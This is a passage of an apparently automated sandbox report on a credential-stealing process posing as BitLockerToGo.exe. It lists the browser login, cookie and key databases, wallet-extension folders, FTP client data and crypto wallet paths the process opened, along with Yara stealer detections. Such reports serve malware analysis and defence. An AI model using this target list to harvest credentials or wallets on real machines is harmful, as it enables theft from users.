Source: BitLockerToGo.exe, 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
Source: BitLockerToGo.exe, 0000000E.00000003.2985106102.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a%\\ElectronCash.
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Libertyt
Source: BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
Source: BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 6E8A.exe, 0000000B.00000002.4476671505.0000021F87A87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $'{0}' is not a valid KeyStore name.
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Tries to harvest and steal ftp login credentials
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Tries to steal Crypto Currency Wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Yara detected Credential Stealer
Source: Yara match File source: 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2985106102.0000000000830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3042842464.0000000000833000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3044811089.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2982362975.000000000082E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 320, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Go Injector
Source: Yara match File source: sslproxydump.pcap, type: PCAP
